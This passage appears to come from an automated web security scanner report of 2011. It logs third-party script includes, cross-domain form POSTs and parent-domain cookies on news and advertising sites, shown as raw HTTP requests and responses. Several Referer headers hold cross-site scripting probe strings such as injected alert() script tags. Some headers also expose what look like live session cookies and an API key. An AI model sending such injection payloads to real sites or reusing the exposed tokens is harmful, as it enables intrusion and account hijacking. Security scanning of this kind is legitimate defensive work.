User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:25 GMT
Content-Length: 430

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D86400"></scr'+'ipt>');

Request 2

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:46 GMT
Content-Length: 395

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D86400"></scr'+'ipt>');
8.2. http://www.examiner.com/sites/all/modules/custom/pajito/widget/content/widget.js.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.examiner.com
Path:   /sites/all/modules/custom/pajito/widget/content/widget.js.php

Request 1

GET /sites/all/modules/custom/pajito/widget/content/widget.js.php?partner=nowpublic HTTP/1.1
Host: www.examiner.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:48:21 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-WebNode: web8.b.examiner.com
Content-Length: 4694

(function (window, document) {
var sScript = 'script',
sIframe = 'iframe',
scriptId = 'examiner-pajita',
rHash = /^([^#]+)#(.*)$/,
/* examiner.com hosting content*/
contentURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/pajito-block.js.php?proxy=http%3A%2F%2Fwww.nowpublic.com%2FexaminerContainerProxy.html&partner=nowpublic",
/* Proxy path */
proxyURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/widget\/content\/contentProxy.php",
contentIframe,
proxyIframe,
hop = Object.prototype.hasOwnProperty,
unesc = window.decodeURIComponent,
esc = window.encodeURIComponent,
postMessage = 'postMessage',
canPost = typeof window[postMessage] == 'function',
targetOrigin = canPost && contentURI.match(/^http:\/\/[^\/]+/)[0],
setAttributes = function (attributes) {
var p;

for (p in attributes) {
if (hop.call(attributes, p)) {
this.setAttribute(p, attributes[p]);
}
}
},
addEvent = function (elm, evt, func) {
var f = function (event) {
var target;

if (!event) { event = window.event; }
if (event.target) { target = event.target; }
else if (event.srcElement) { target = event.srcElement; }
if (target && target.nodeType == 3) { target = target.parentNode; }

return func.apply(target, arguments);
};

if (elm.addEventListener) {
elm.addEventListener(evt, f, false);
}
else if (elm.attachEvent) {
elm.attachEvent(('on' + evt), f);
}
else {
elm['on' + evt] = f;
}
},
parseParameters = function (message) {
var items = {},
pairs = message.split(/&/),
pl = pairs.length,
i = 0,
value;

for (; i < pl; i += 1) {
value = pairs[i].split(/[=]/);
items[unesc(value[0])] = unesc(value[1]);
}

return items;
},
escapeParameters = function (data) {
var message = [],
p;

for (p in data) {
if (hop.call(data, p)) {
message.push(esc(p) + '=' +
...[SNIP]...

Request 2

GET /sites/all/modules/custom/pajito/widget/content/widget.js.php?partner=nowpublic HTTP/1.1
Host: www.examiner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:48:50 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-WebNode: web10.b.examiner.com
Content-Length: 4751

(function (window, document) {
var sScript = 'script',
sIframe = 'iframe',
scriptId = 'examiner-pajita',
rHash = /^([^#]+)#(.*)$/,
/* examiner.com hosting content*/
contentURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/pajito-block.js.php?proxy=http%3A%2F%2Fwww.examiner.com%2Fsites%2Fall%2Fmodules%2Fcustom%2Fpajito%2Fwidget%2Fhost%2FexaminerContainerProxy.html&partner=nowpublic",
/* Proxy path */
proxyURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/widget\/content\/contentProxy.php",
contentIframe,
proxyIframe,
hop = Object.prototype.hasOwnProperty,
unesc = window.decodeURIComponent,
esc = window.encodeURIComponent,
postMessage = 'postMessage',
canPost = typeof window[postMessage] == 'function',
targetOrigin = canPost && contentURI.match(/^http:\/\/[^\/]+/)[0],
setAttributes = function (attributes) {
var p;

for (p in attributes) {
if (hop.call(attributes, p)) {
this.setAttribute(p, attributes[p]);
}
}
},
addEvent = function (elm, evt, func) {
var f = function (event) {
var target;

if (!event) { event = window.event; }
if (event.target) { target = event.target; }
else if (event.srcElement) { target = event.srcElement; }
if (target && target.nodeType == 3) { target = target.parentNode; }

return func.apply(target, arguments);
};

if (elm.addEventListener) {
elm.addEventListener(evt, f, false);
}
else if (elm.attachEvent) {
elm.attachEvent(('on' + evt), f);
}
else {
elm['on' + evt] = f;
}
},
parseParameters = function (message) {
var items = {},
pairs = message.split(/&/),
pl = pairs.length,
i = 0,
value;

for (; i < pl; i += 1) {
value = pairs[i].split(/[=]/);
items[unesc(value[0])] = unesc(value[1]);
}

return items;
},
escapeParameters = function (data) {
var message = [],
p;

for (p in data) {
if (hop
...[SNIP]...
9. Cross-domain POST  previous  next
There are 3 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

9.1. http://savannahnow.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain clicks.skem1.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:43:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 12:48:52 GMT
Last-Modified: Mon, 12 Sep 2011 12:43:52 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315831432"-gzip
Vary: Accept-Encoding
Content-Length: 149668
Content-Type: text/html; charset=utf-8
Age: 273
X-Cache: HIT from sms3.morris.com
X-Cache-Lookup: HIT from sms3.morris.com:3128
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<td style="width:200px; padding:4px 0px 0px 0px; margin:0px 0px 0px 0px;">
<form accept-charset="UTF-8" name="IBNSubscribe" action="http://clicks.skem1.com/signup/" method="POST" target="_blank">
<input name="c" value="2891" type="hidden">
...[SNIP]...
9.2. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/all/modules/morris/yca_plugin/yahoo.cssca685

Issue detail

The page contains a form which POSTs data to the domain clicks.skem1.com. The form contains the following fields:

Request

GET /sites/all/modules/morris/yca_plugin/yahoo.cssca685 HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-morris.overture.com/js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685%22%3E%3Cscript%3Ealert(1)%3C/script%3E7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zvents_tracker_sid=13158497232050.9525420391000807; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=222803225.1251345904.1315849732.1315849732.1315849732.1; __utmb=222803225.4.10.1315849732; __utmc=222803225; __utmz=222803225.1315849732.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; bd-local=fb-id=1B3C6937-8DDC-4B7E-95C5-7878A957141E; _chartbeat2=mu28j07dwufmztf2.1315849749723; iePersistentData_Pencil_Expand_New_129534=1

Response

HTTP/1.0 404 Not Found
Date: Mon, 12 Sep 2011 12:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:04:58 GMT
Last-Modified: Mon, 12 Sep 2011 12:59:58 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315832398"-gzip
Vary: Accept-Encoding
Content-Length: 79084
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<td style="width:200px; padding:4px 0px 0px 0px; margin:0px 0px 0px 0px;">
<form accept-charset="UTF-8" name="IBNSubscribe" action="http://clicks.skem1.com/signup/" method="POST" target="_blank">
<input name="c" value="2891" type="hidden">
...[SNIP]...
9.3. http://www.popsci.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain popularscience.bonniersubscriptions.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: web4f D=18707
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Language: en
cache-control: max-age = 300
Content-Length: 116217
Date: Mon, 12 Sep 2011 12:48:09 GMT
X-Varnish: 1570744016 1570730120
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: webcache11: HIT 87

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
</div>
<form action="https://popularscience.bonniersubscriptions.com/HAG0-005/" method="post">
<div id="fields">
...[SNIP]...
10. Cookie scoped to parent domain  previous  next
There are 44 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

10.1. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=117090495&th=37103964303&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fc14.zedo.com%2FOzoDB%2Fcutils%2FR53_7_7%2Fjsc%2F1545%2Fzpu.html%3Fn%3D1545%3Bf%3D1%3Bz%3D2-110&f=2&p=9679837&a=1&rnd=9678783 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 09-Sep-2021 12:49:41 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1213154547 = new Image();\r\n tfimg1213154547.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=0";\r\n})();\r\n<\/sc
...[SNIP]...
10.2. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
10.3. http://api.bizographics.com/v1/profile.redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 12 Sep 2011 13:06:08 GMT
Location: http://dts1.raasnet.com/dts/bizo/in?industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXM6UUqwNaQIaj5XcunNcMDa7Re6IGD4lJwvYvTFPJeCAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRaQakHSuYMDekIwbdwzisbvEVUJBxdqAyBFiiNVUlT95AiiktrG07sTpWxGp85dzvukEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive

10.4. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk;Domain=.google.com;Path=/;Expires=Thu, 09-Sep-2021 13:04:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 12 Sep 2011 13:04:27 GMT
Date: Mon, 12 Sep 2011 13:04:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5398

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23579912-2b1b2e17';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...
10.5. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=172392041&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.dome9.com%252F%26jsref%3D%26rnd%3D1315849265708&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.dome9.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
